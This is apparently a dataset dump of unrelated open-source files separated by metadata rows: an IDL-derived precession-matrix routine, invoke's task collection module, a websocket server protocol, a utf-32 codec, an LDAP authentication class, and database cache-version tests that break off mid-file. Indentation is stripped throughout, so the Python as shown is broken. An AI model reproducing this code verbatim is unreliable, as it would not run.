# equatorial rectangular coordinates
#
# OPTIONAL INPUT KEYWORDS:
# /FK4 - If this keyword is set, the FK4 (B1950.0) system precession
# angles are used to compute the precession matrix. The
# default is to use FK5 (J2000.0) precession angles
#
# EXAMPLES:
# Return the precession matrix from 1950.0 to 1975.0 in the FK4 system
#
# IDL> matrix = PREMAT( 1950.0, 1975.0, /FK4)
#
# PROCEDURE:
# FK4 constants from "Computational Spherical Astronomy" by Taff (1983),
# p. 24. (FK4). FK5 constants from "Astronomical Almanac Explanatory
# Supplement 1992, page 104 Table 3.211.1.
#
# REVISION HISTORY
# Written, Wayne Landsman, HSTX Corporation, June 1994
# Converted to IDL V5.0 W. Landsman September 1997
#-
"""
deg_to_rad = pi/180.0
sec_to_rad = deg_to_rad/3600.
T = 0.001 * ( equinox2 - equinox1)
if not FK4: # FK5
ST = 0.001*( equinox1 - 2000.)
# Compute 3 rotation angles
A = sec_to_rad * T * (23062.181 + ST*(139.656 +0.0139*ST) \
+ T*(30.188 - 0.344*ST+17.998*T))
B = sec_to_rad * T * T * (79.280 + 0.410*ST + 0.205*T) + A
C = sec_to_rad * T * (20043.109 - ST*(85.33 + 0.217*ST) \
+ T*(-42.665 - 0.217*ST -41.833*T))
else:
ST = 0.001*( equinox1 - 1900.)
# Compute 3 rotation angles
A = sec_to_rad * T * (23042.53 + ST*(139.75 +0.06*ST) \
+ T*(30.23 - 0.27*ST+18.0*T))
B = sec_to_rad * T * T * (79.27 + 0.66*ST + 0.32*T) + A
C = sec_to_rad * T * (20046.85 - ST*(85.33 + 0.37*ST) \
+ T*(-42.67 - 0.37*ST -41.8*T))
sina = sin(A)
sinb = sin(B)
sinc = sin(C)
cosa = cos(A)
cosb = cos(B)
cosc = cos(C)
r = np.empty([3, 3])
r[:,0] = [ cosa*cosb*cosc-sina*sinb, sina*cosb+cosa*sinb*cosc, cosa*sinc]
r[:,1] = [-cosa*sinb-sina*cosb*cosc, cosa*cosb-sina*sinb*cosc, -sina*sinc]
r[:,2] = [-cosb*sinc, -sinb*sinc, cosc]
return r
def idl_like_pound(a, b):
a = np.array(a, copy=False)
b = np.array(b, copy=False)
if len(a.shape) == 2 and len(b.shape) == 1:
return np.dot(a.T, b)
if len(a.shape) == 1 and len(b.shape) == 2:
res = np.dot(a, b.T)
return res.reshape(1, res.size)
else:
return np.dot(a, b)
def idl_like_mod(a, b):
a = np.array(a, copy=False)
b = np.array(b, copy=False)
res = np.abs(a) % b
if a.shape == tuple():
if a<0:
return -res
else:
return res
else:
res[a<0] *= -1
return res
| mit | 7,700,543,838,721,033,000 | 37.855025 | 85 | 0.578418 | false |
mattrobenolt/invoke | invoke/collection.py | 5 | 15319 | import copy
import types
from .vendor import six
from .vendor.lexicon import Lexicon
from .config import merge_dicts
from .parser import Context as ParserContext
from .tasks import Task
class Collection(object):
"""
A collection of executable tasks.
"""
def __init__(self, *args, **kwargs):
"""
Create a new task collection/namespace.
`.Collection` offers a set of methods for building a collection of
tasks from scratch, plus a convenient constructor wrapping said API.
In either case:
* the first positional argument may be a string, which (if given) is
used as the collection's default name when performing namespace
lookups;
* a ``loaded_from`` keyword argument may be given, which sets metadata
indicating the filesystem path the collection was loaded from. This
is used as a guide when loading per-project :ref:`configuration files
<config-hierarchy>`.
**The method approach**
May initialize with no arguments and use methods (e.g.
`.add_task`/`.add_collection`) to insert objects::
c = Collection()
c.add_task(some_task)
If an initial string argument is given, it is used as the default name
for this collection, should it be inserted into another collection as a
sub-namespace::
docs = Collection('docs')
docs.add_task(doc_task)
ns = Collection()
ns.add_task(top_level_task)
ns.add_collection(docs)
# Valid identifiers are now 'top_level_task' and 'docs.doc_task'
# (assuming the task objects were actually named the same as the
# variables we're using :))
For details, see the API docs for the rest of the class.
**The constructor approach**
All ``*args`` given to `.Collection` (besides the abovementioned
optional positional 'name' argument and ``loaded_from`` kwarg) are
expected to be `.Task` or `.Collection` instances which will be passed
to `.add_task`/`.add_collection` as appropriate. Module objects are
also valid (as they are for `.add_collection`). For example, the below
snippet results in the same two task identifiers as the one above::
ns = Collection(top_level_task, Collection('docs', doc_task))
If any ``**kwargs`` are given, the keywords are used as the initial
name arguments for the respective values::
ns = Collection(
top_level_task=some_other_task,
docs=Collection(doc_task)
)
That's exactly equivalent to::
docs = Collection(doc_task)
ns = Collection()
ns.add_task(some_other_task, 'top_level_task')
ns.add_collection(docs, 'docs')
See individual methods' API docs for details.
"""
# Initialize
self.tasks = Lexicon()
self.collections = Lexicon()
self.default = None
self.name = None
self._configuration = {}
# Name if applicable
args = list(args)
if args and isinstance(args[0], six.string_types):
self.name = args.pop(0)
# Specific kwargs if applicable
self.loaded_from = kwargs.pop('loaded_from', None)
# Dispatch args/kwargs
for arg in args:
self._add_object(arg)
# Dispatch kwargs
for name, obj in six.iteritems(kwargs):
self._add_object(obj, name)
def _add_object(self, obj, name=None):
if isinstance(obj, Task):
method = self.add_task
elif isinstance(obj, (Collection, types.ModuleType)):
method = self.add_collection
else:
raise TypeError("No idea how to insert {0!r}!".format(type(obj)))
return method(obj, name=name)
def __str__(self):
return "<Collection {0!r}: {1}>".format(
self.name, ", ".join(sorted(self.tasks.keys())))
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.name == other.name and self.tasks == other.tasks
@classmethod
def from_module(self, module, name=None, config=None, loaded_from=None):
"""
Return a new `.Collection` created from ``module``.
Inspects ``module`` for any `.Task` instances and adds them to a new
`.Collection`, returning it. If any explicit namespace collections
exist (named ``ns`` or ``namespace``) a copy of that collection object
is preferentially loaded instead.
When the implicit/default collection is generated, it will be named
after the module's ``__name__`` attribute, or its last dotted section
if it's a submodule. (I.e. it should usually map to the actual ``.py``
filename.)
Explicitly given collections will only be given that module-derived
name if they don't already have a valid ``.name`` attribute.
:param str name:
A string, which if given will override any automatically derived
collection name (or name set on the module's root namespace, if it
has one.)
:param dict config:
Used to set config options on the newly created `.Collection`
before returning it (saving you a call to `.configure`.)
If the imported module had a root namespace object, ``config`` is
merged on top of it (i.e. overriding any conflicts.)
:param str loaded_from:
Identical to the same-named kwarg from the regular class
constructor - should be the path where the module was
found.
"""
module_name = module.__name__.split('.')[-1]
# See if the module provides a default NS to use in lieu of creating
# our own collection.
for candidate in ('ns', 'namespace'):
obj = getattr(module, candidate, None)
if obj and isinstance(obj, Collection):
# TODO: make this into Collection.clone() or similar
# Explicitly given name wins over root ns name which wins over
# actual module name.
ret = Collection(name or obj.name or module_name,
loaded_from=loaded_from)
ret.tasks = copy.deepcopy(obj.tasks)
ret.collections = copy.deepcopy(obj.collections)
ret.default = copy.deepcopy(obj.default)
# Explicitly given config wins over root ns config
obj_config = copy.deepcopy(obj._configuration)
if config:
merge_dicts(obj_config, config)
ret._configuration = obj_config
return ret
# Failing that, make our own collection from the module's tasks.
tasks = filter(
lambda x: isinstance(x, Task),
vars(module).values()
)
# Again, explicit name wins over implicit one from module path
collection = Collection(name or module_name, loaded_from=loaded_from)
for task in tasks:
collection.add_task(task)
if config:
collection.configure(config)
return collection
def add_task(self, task, name=None, default=None):
"""
Add `.Task` ``task`` to this collection.
:param task: The `.Task` object to add to this collection.
:param name:
Optional string name to bind to (overrides the task's own
self-defined ``name`` attribute and/or any Python identifier (i.e.
``.func_name``.)
:param default: Whether this task should be the collection default.
"""
if name is None:
if task.name:
name = task.name
elif hasattr(task.body, 'func_name'):
name = task.body.func_name
elif hasattr(task.body, '__name__'):
name = task.__name__
else:
raise ValueError("Could not obtain a name for this task!")
if name in self.collections:
raise ValueError("Name conflict: this collection has a sub-collection named {0!r} already".format(name)) # noqa
self.tasks[name] = task
for alias in task.aliases:
self.tasks.alias(alias, to=name)
if default is True or (default is None and task.is_default):
if self.default:
msg = "'{0}' cannot be the default because '{1}' already is!"
raise ValueError(msg.format(name, self.default))
self.default = name
def add_collection(self, coll, name=None):
"""
Add `.Collection` ``coll`` as a sub-collection of this one.
:param coll: The `.Collection` to add.
:param str name:
The name to attach the collection as. Defaults to the collection's
own internal name.
"""
# Handle module-as-collection
if isinstance(coll, types.ModuleType):
coll = Collection.from_module(coll)
# Ensure we have a name, or die trying
name = name or coll.name
if not name:
raise ValueError("Non-root collections must have a name!")
# Test for conflict
if name in self.tasks:
raise ValueError("Name conflict: this collection has a task named {0!r} already".format(name)) # noqa
# Insert
self.collections[name] = coll
def split_path(self, path):
"""
Obtain first collection + remainder, of a task path.
E.g. for ``"subcollection.taskname"``, return ``("subcollection",
"taskname")``; for ``"subcollection.nested.taskname"`` return
``("subcollection", "nested.taskname")``, etc.
An empty path becomes simply ``('', '')``.
"""
parts = path.split('.')
coll = parts.pop(0)
rest = '.'.join(parts)
return coll, rest
def __getitem__(self, name=None):
"""
Returns task named ``name``. Honors aliases and subcollections.
If this collection has a default task, it is returned when ``name`` is
empty or ``None``. If empty input is given and no task has been
selected as the default, ValueError will be raised.
Tasks within subcollections should be given in dotted form, e.g.
'foo.bar'. Subcollection default tasks will be returned on the
subcollection's name.
"""
return self.task_with_config(name)[0]
def _task_with_merged_config(self, coll, rest, ours):
task, config = self.collections[coll].task_with_config(rest)
return task, dict(config, **ours)
def task_with_config(self, name):
"""
Return task named ``name`` plus its configuration dict.
E.g. in a deeply nested tree, this method returns the `.Task`, and a
configuration dict created by merging that of this `.Collection` and
any nested `Collections <.Collection>`, up through the one actually
holding the `.Task`.
See `~.Collection.__getitem__` for semantics of the ``name`` argument.
:returns: Two-tuple of (`.Task`, `dict`).
"""
# Our top level configuration
ours = self.configuration()
# Default task for this collection itself
if not name:
if self.default:
return self[self.default], ours
else:
raise ValueError("This collection has no default task.")
# Non-default tasks within subcollections -> recurse (sorta)
if '.' in name:
coll, rest = self.split_path(name)
return self._task_with_merged_config(coll, rest, ours)
# Default task for subcollections (via empty-name lookup)
if name in self.collections:
return self._task_with_merged_config(name, '', ours)
# Regular task lookup
return self.tasks[name], ours
def __contains__(self, name):
try:
self[name]
return True
except KeyError:
return False
def to_contexts(self):
"""
Returns all contained tasks and subtasks as a list of parser contexts.
"""
result = []
for primary, aliases in six.iteritems(self.task_names):
task = self[primary]
result.append(ParserContext(
name=primary, aliases=aliases, args=task.get_arguments()
))
return result
def subtask_name(self, collection_name, task_name):
return '.'.join([collection_name, task_name])
@property
def task_names(self):
"""
Return all task identifiers for this collection as a dict.
Specifically, a dict with the primary/"real" task names as the key, and
any aliases as a list value.
"""
ret = {}
# Our own tasks get no prefix, just go in as-is: {name: [aliases]}
for name, task in six.iteritems(self.tasks):
ret[name] = task.aliases
# Subcollection tasks get both name + aliases prefixed
for coll_name, coll in six.iteritems(self.collections):
for task_name, aliases in six.iteritems(coll.task_names):
# Cast to list to handle Py3 map() 'map' return value,
# so we can add to it down below if necessary.
aliases = list(map(
lambda x: self.subtask_name(coll_name, x),
aliases
))
# Tack on collection name to alias list if this task is the
# collection's default.
if coll.default and coll.default == task_name:
aliases += (coll_name,)
ret[self.subtask_name(coll_name, task_name)] = aliases
return ret
def configuration(self, taskpath=None):
"""
Obtain merged configuration values from collection & children.
.. note::
Merging uses ``copy.deepcopy`` to prevent state bleed.
:param taskpath:
(Optional) Task name/path, identical to that used for
`~.Collection.__getitem__` (e.g. may be dotted for nested tasks,
etc.) Used to decide which path to follow in the collection tree
when merging config values.
:returns: A `dict` containing configuration values.
"""
if taskpath is None:
return copy.deepcopy(self._configuration)
return self.task_with_config(taskpath)[1]
def configure(self, options):
"""
(Recursively) merge ``options`` into the current `.configuration`.
Options configured this way will be available to all
:doc:`contextualized tasks </concepts/context>`. It is recommended to
use unique keys to avoid potential clashes with other config options
For example, if you were configuring a Sphinx docs build target
directory, it's better to use a key like ``'sphinx.target'`` than
simply ``'target'``.
:param options: An object implementing the dictionary protocol.
:returns: ``None``.
"""
merge_dicts(self._configuration, options)
| bsd-2-clause | -8,001,643,771,406,033,000 | 37.880711 | 123 | 0.590639 | false |
Evgenus/revigred-server | revigred/protocol.py | 1 | 1500 | import asyncio
import json
from autobahn.asyncio.websocket import (
WebSocketServerProtocol,
WebSocketServerFactory,
)
class ServerProtocol(WebSocketServerProtocol):
def onConnect(self, request):
self.client = self.model.create_new_user()
self.client.connect(self)
self.logger.debug("Client connecting: {0}", request.peer)
@asyncio.coroutine
def onOpen(self):
self.client.channel_opened()
@asyncio.coroutine
def onMessage(self, payload, isBinary):
if isBinary:
pass
else:
message = json.loads(payload.decode('utf8'))
self.logger.debug("Text message received from {0}: {1}", self.client, payload.decode('utf8'))
name, args, kwargs = message
self.client.dispatch(name, *args, **kwargs)
def onClose(self, wasClean, code, reason):
self.client.disconnect()
self.logger.debug("WebSocket connection closed: {0}", reason)
def sendMessage(self, message):
data = json.dumps(message).encode("utf-8")
super().sendMessage(data, False)
class ServerFactory(WebSocketServerFactory):
protocol = ServerProtocol
def __init__(self, *args, **kwargs):
self.model = kwargs.pop("model")
self.logger = kwargs.pop("logger")
super().__init__(*args, **kwargs)
def __call__(self):
proto = super().__call__()
proto.model = self.model
proto.logger = self.logger
return proto | bsd-3-clause | -5,139,739,119,801,721,000 | 29.632653 | 105 | 0.625333 | false |
deanhiller/databus | webapp/play1.3.x/python/Lib/encodings/utf_32.py | 3 | 5098 | """
Python 'utf-32' Codec
"""
import codecs, sys
### Codec APIs
encode = codecs.utf_32_encode
def decode(input, errors='strict'):
return codecs.utf_32_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def __init__(self, errors='strict'):
codecs.IncrementalEncoder.__init__(self, errors)
self.encoder = None
def encode(self, input, final=False):
if self.encoder is None:
result = codecs.utf_32_encode(input, self.errors)[0]
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
return self.encoder(input, self.errors)[0]
def reset(self):
codecs.IncrementalEncoder.reset(self)
self.encoder = None
def getstate(self):
# state info we return to the caller:
# 0: stream is in natural order for this platform
# 2: endianness hasn't been determined yet
# (we're never writing in unnatural order)
return (2 if self.encoder is None else 0)
def setstate(self, state):
if state:
self.encoder = None
else:
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
def __init__(self, errors='strict'):
codecs.BufferedIncrementalDecoder.__init__(self, errors)
self.decoder = None
def _buffer_decode(self, input, errors, final):
if self.decoder is None:
(output, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, final)
if byteorder == -1:
self.decoder = codecs.utf_32_le_decode
elif byteorder == 1:
self.decoder = codecs.utf_32_be_decode
elif consumed >= 4:
raise UnicodeError("UTF-32 stream does not start with BOM")
return (output, consumed)
return self.decoder(input, self.errors, final)
def reset(self):
codecs.BufferedIncrementalDecoder.reset(self)
self.decoder = None
def getstate(self):
# additonal state info from the base class must be None here,
# as it isn't passed along to the caller
state = codecs.BufferedIncrementalDecoder.getstate(self)[0]
# additional state info we pass to the caller:
# 0: stream is in natural order for this platform
# 1: stream is in unnatural order
# 2: endianness hasn't been determined yet
if self.decoder is None:
return (state, 2)
addstate = int((sys.byteorder == "big") !=
(self.decoder is codecs.utf_32_be_decode))
return (state, addstate)
def setstate(self, state):
# state[1] will be ignored by BufferedIncrementalDecoder.setstate()
codecs.BufferedIncrementalDecoder.setstate(self, state)
state = state[1]
if state == 0:
self.decoder = (codecs.utf_32_be_decode
if sys.byteorder == "big"
else codecs.utf_32_le_decode)
elif state == 1:
self.decoder = (codecs.utf_32_le_decode
if sys.byteorder == "big"
else codecs.utf_32_be_decode)
else:
self.decoder = None
class StreamWriter(codecs.StreamWriter):
def __init__(self, stream, errors='strict'):
self.bom_written = False
codecs.StreamWriter.__init__(self, stream, errors)
def encode(self, input, errors='strict'):
self.bom_written = True
result = codecs.utf_32_encode(input, errors)
if sys.byteorder == 'little':
self.encode = codecs.utf_32_le_encode
else:
self.encode = codecs.utf_32_be_encode
return result
class StreamReader(codecs.StreamReader):
def reset(self):
codecs.StreamReader.reset(self)
try:
del self.decode
except AttributeError:
pass
def decode(self, input, errors='strict'):
(object, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, False)
if byteorder == -1:
self.decode = codecs.utf_32_le_decode
elif byteorder == 1:
self.decode = codecs.utf_32_be_decode
elif consumed>=4:
raise UnicodeError,"UTF-32 stream does not start with BOM"
return (object, consumed)
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-32',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| mpl-2.0 | 694,609,488,705,437,200 | 33.402778 | 75 | 0.572774 | false |
rmartinjak/sagenb | sagenb/notebook/auth.py | 6 | 4496 | class AuthMethod():
"""
Abstract class for authmethods that are used by ExtAuthUserManager
All auth methods must implement the following methods
"""
def __init__(self, conf):
self._conf = conf
def check_user(self, username):
raise NotImplementedError
def check_password(self, username, password):
raise NotImplementedError
def get_attrib(self, username, attrib):
raise NotImplementedError
class LdapAuth(AuthMethod):
"""
Authentication via LDAP
User authentication basically works like this:
1.1) bind to LDAP with either
- generic configured DN and password (simple bind)
- GSSAPI (e.g. Kerberos)
1.2) find the ldap object matching username.
2) if 1 succeeds, try simple bind with the supplied user DN and password
"""
def _require_ldap(default_return):
"""
function decorator to
- disable LDAP auth
- return a "default" value (decorator argument)
if importing ldap fails
"""
def wrap(f):
def wrapped_f(self, *args, **kwargs):
try:
from ldap import __version__ as ldap_version
except ImportError:
print "cannot 'import ldap', disabling LDAP auth"
self._conf['auth_ldap'] = False
return default_return
else:
return f(self, *args, **kwargs)
return wrapped_f
return wrap
def __init__(self, conf):
AuthMethod.__init__(self, conf)
def _ldap_search(self, query, attrlist=None, sizelimit=20):
"""
runs any ldap query passed as arg
"""
import ldap
from ldap.sasl import gssapi
conn = ldap.initialize(self._conf['ldap_uri'])
try:
if self._conf['ldap_gssapi']:
token = gssapi()
conn.sasl_interactive_bind_s('', token)
else:
conn.simple_bind_s(
self._conf['ldap_binddn'], self._conf['ldap_bindpw'])
result = conn.search_ext_s(
self._conf['ldap_basedn'],
ldap.SCOPE_SUBTREE,
filterstr=query,
attrlist=attrlist,
timeout=self._conf['ldap_timeout'],
sizelimit=sizelimit)
except ldap.LDAPError, e:
print 'LDAP Error: %s' % str(e)
return []
finally:
conn.unbind_s()
return result
def _get_ldapuser(self, username, attrlist=None):
"""
Returns a tuple containing the DN and a dict of attributes of the given
username, or (None, None) if the username is not found
"""
from ldap.filter import filter_format
query = filter_format(
'(%s=%s)', (self._conf['ldap_username_attrib'], username))
result = self._ldap_search(query, attrlist)
# only allow one unique result
# (len(result) will probably always be 0 or 1)
return result[0] if len(result) == 1 else (None, None)
@_require_ldap(False)
def check_user(self, username):
# LDAP is NOT case sensitive while sage is, so only allow lowercase
if not username.islower():
return False
dn, attribs = self._get_ldapuser(username)
return dn is not None
@_require_ldap(False)
def check_password(self, username, password):
import ldap
dn, attribs = self._get_ldapuser(username)
if not dn:
return False
# try to bind with found DN
conn = ldap.initialize(uri=self._conf['ldap_uri'])
try:
conn.simple_bind_s(dn, password)
return True
except ldap.INVALID_CREDENTIALS:
return False
except ldap.LDAPError, e:
print 'LDAP Error: %s' % str(e)
return False
finally:
conn.unbind_s()
@_require_ldap('')
def get_attrib(self, username, attrib):
# 'translate' attribute names used in ExtAuthUserManager
# to their ldap equivalents
# "email" is "mail"
if attrib == 'email':
attrib = 'mail'
dn, attribs = self._get_ldapuser(username, [attrib])
if not attribs:
return ''
# return the first item or '' if the attribute is missing
return attribs.get(attrib, [''])[0]
| gpl-2.0 | -6,063,709,309,822,882,000 | 29.794521 | 79 | 0.554048 | false |
c2corg/v6_api | c2corg_api/tests/models/test_cache_version.py | 1 | 17818 | import datetime
from c2corg_api.models.area import Area
from c2corg_api.models.area_association import AreaAssociation
from c2corg_api.models.association import Association
from c2corg_api.models.cache_version import CacheVersion, \
update_cache_version, update_cache_version_associations, \
update_cache_version_for_area, update_cache_version_for_map
from c2corg_api.models.outing import Outing, OUTING_TYPE
from c2corg_api.models.route import Route, ROUTE_TYPE
from c2corg_api.models.topo_map import TopoMap
from c2corg_api.models.topo_map_association import TopoMapAssociation
from c2corg_api.models.user import User
from c2corg_api.models.user_profile import UserProfile
from c2corg_api.models.waypoint import Waypoint, WAYPOINT_TYPE, WaypointLocale
from c2corg_api.tests import BaseTestCase
from c2corg_api.views.document import DocumentRest
class TestCacheVersion(BaseTestCase):
def setUp(self): # noqa
BaseTestCase.setUp(self)
def test_trigger_create_cache_version(self):
waypoint = Waypoint(waypoint_type='summit')
self.session.add(waypoint)
self.session.flush()
cache_version = self.session.query(CacheVersion).get(
waypoint.document_id)
self.assertIsNotNone(cache_version)
self.assertIsNotNone(cache_version.version)
self.assertIsNotNone(cache_version.last_updated)
def test_update_cache_version_single_wp(self):
waypoint = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all([waypoint, waypoint_unrelated])
self.session.flush()
cache_version = self.session.query(CacheVersion).get(
waypoint.document_id)
cache_version.last_updated = datetime.datetime(2016, 1, 1, 12, 1, 0)
self.session.flush()
current_version = cache_version.version
current_last_updated = cache_version.last_updated
update_cache_version(waypoint)
self.session.refresh(cache_version)
self.assertEqual(cache_version.version, current_version + 1)
self.assertNotEqual(cache_version.last_updated, current_last_updated)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_wp_with_associations(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated])
self.session.flush()
self.session.add(Association.create(waypoint1, waypoint2))
self.session.add(Association.create(waypoint3, waypoint1))
self.session.flush()
update_cache_version(waypoint1)
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_wp_as_main_wp(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(main_waypoint=waypoint1, activities=['skitouring'])
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated, route])
self.session.flush()
self.session.add(Association.create(waypoint1, route))
self.session.add(Association.create(waypoint2, route))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version(waypoint1)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_wp3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_wp1.version, 3)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_wp3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_route(self):
route1 = Route(activities=['skitouring'])
route2 = Route(activities=['skitouring'])
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint_unrelated, route1, route2])
self.session.flush()
self.session.add(Association.create(waypoint1, route1))
self.session.add(Association.create(route2, route1))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.flush()
update_cache_version(route1)
cache_version_route1 = self.session.query(CacheVersion).get(
route1.document_id)
cache_version_route2 = self.session.query(CacheVersion).get(
route2.document_id)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_route1.version, 2)
self.assertEqual(cache_version_route2.version, 2)
self.assertEqual(cache_version_wp1.version, 3)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_outing(self):
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
route1 = Route(activities=['skitouring'])
route2 = Route(activities=['skitouring'])
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[outing, waypoint1, waypoint2, waypoint_unrelated, route1, route2])
self.session.flush()
self.session.add(Association.create(route1, outing))
self.session.add(Association.create(waypoint1, route1))
self.session.add(Association.create(route2, outing))
self.session.add(Association.create(waypoint2, waypoint1))
self.session.flush()
update_cache_version(outing)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
cache_version_route1 = self.session.query(CacheVersion).get(
route1.document_id)
cache_version_route2 = self.session.query(CacheVersion).get(
route2.document_id)
cache_version_wp1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version_wp2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_route1.version, 2)
self.assertEqual(cache_version_route2.version, 2)
self.assertEqual(cache_version_wp1.version, 2)
self.assertEqual(cache_version_wp2.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_user(self):
""" Test that outings are invalidated if an user name changes.
"""
outing = Outing(
activities=['skitouring'],
date_start=datetime.date(2016, 2, 1),
date_end=datetime.date(2016, 2, 1))
user_profile = UserProfile()
self.session.add_all([outing, user_profile])
self.session.flush()
self.session.add(Association.create(user_profile, outing))
self.session.flush()
update_cache_version(user_profile)
cache_version_user_profile = self.session.query(CacheVersion).get(
user_profile.document_id)
cache_version_outing = self.session.query(CacheVersion).get(
outing.document_id)
self.assertEqual(cache_version_outing.version, 2)
self.assertEqual(cache_version_user_profile.version, 2)
def test_update_cache_version_user_document_version(self):
""" Test that a document is invalidated if a user name of a user that
edited one of the document versions is changed.
"""
waypoint = Waypoint(
waypoint_type='summit', elevation=2203, locales=[
WaypointLocale(lang='en', title='...', description='...')])
user_profile = UserProfile()
user = User(
name='test_user',
username='test_user', email='[email protected]',
forum_username='testuser', password='test_user',
email_validated=True, profile=user_profile)
self.session.add_all([waypoint, user_profile, user])
self.session.flush()
DocumentRest.create_new_version(waypoint, user.id)
update_cache_version(user_profile)
cache_version_user_profile = self.session.query(CacheVersion).get(
user_profile.document_id)
cache_version_waypoint = self.session.query(CacheVersion).get(
waypoint.document_id)
self.assertEqual(cache_version_waypoint.version, 2)
self.assertEqual(cache_version_user_profile.version, 2)
def test_update_cache_version_associations_removed_wp(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated])
self.session.flush()
update_cache_version_associations([], [
{'parent_id': waypoint1.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': waypoint2.document_id, 'child_type': WAYPOINT_TYPE},
{'parent_id': waypoint3.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': waypoint1.document_id, 'child_type': WAYPOINT_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_associations_removed_wp_route(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
waypoint3 = Waypoint(waypoint_type='summit')
waypoint_unrelated = Waypoint(waypoint_type='summit')
route = Route(activities=['skitouring'])
self.session.add_all(
[waypoint1, waypoint2, waypoint3, waypoint_unrelated, route])
self.session.flush()
self.session.add(Association.create(waypoint2, waypoint1))
self.session.add(Association.create(waypoint3, waypoint2))
self.session.flush()
update_cache_version_associations([], [
{'parent_id': waypoint1.document_id, 'parent_type': WAYPOINT_TYPE,
'child_id': route.document_id, 'child_type': ROUTE_TYPE}
])
cache_version1 = self.session.query(CacheVersion).get(
waypoint1.document_id)
cache_version2 = self.session.query(CacheVersion).get(
waypoint2.document_id)
cache_version3 = self.session.query(CacheVersion).get(
waypoint3.document_id)
cache_version_route = self.session.query(CacheVersion).get(
route.document_id)
cache_version_untouched = self.session.query(CacheVersion).get(
waypoint_unrelated.document_id)
self.assertEqual(cache_version1.version, 2)
self.assertEqual(cache_version2.version, 2)
self.assertEqual(cache_version3.version, 2)
self.assertEqual(cache_version_route.version, 2)
self.assertEqual(cache_version_untouched.version, 1)
def test_update_cache_version_associations_removed_route_outing(self):
waypoint1 = Waypoint(waypoint_type='summit')
waypoint2 = Waypoint(waypoint_type='summit')
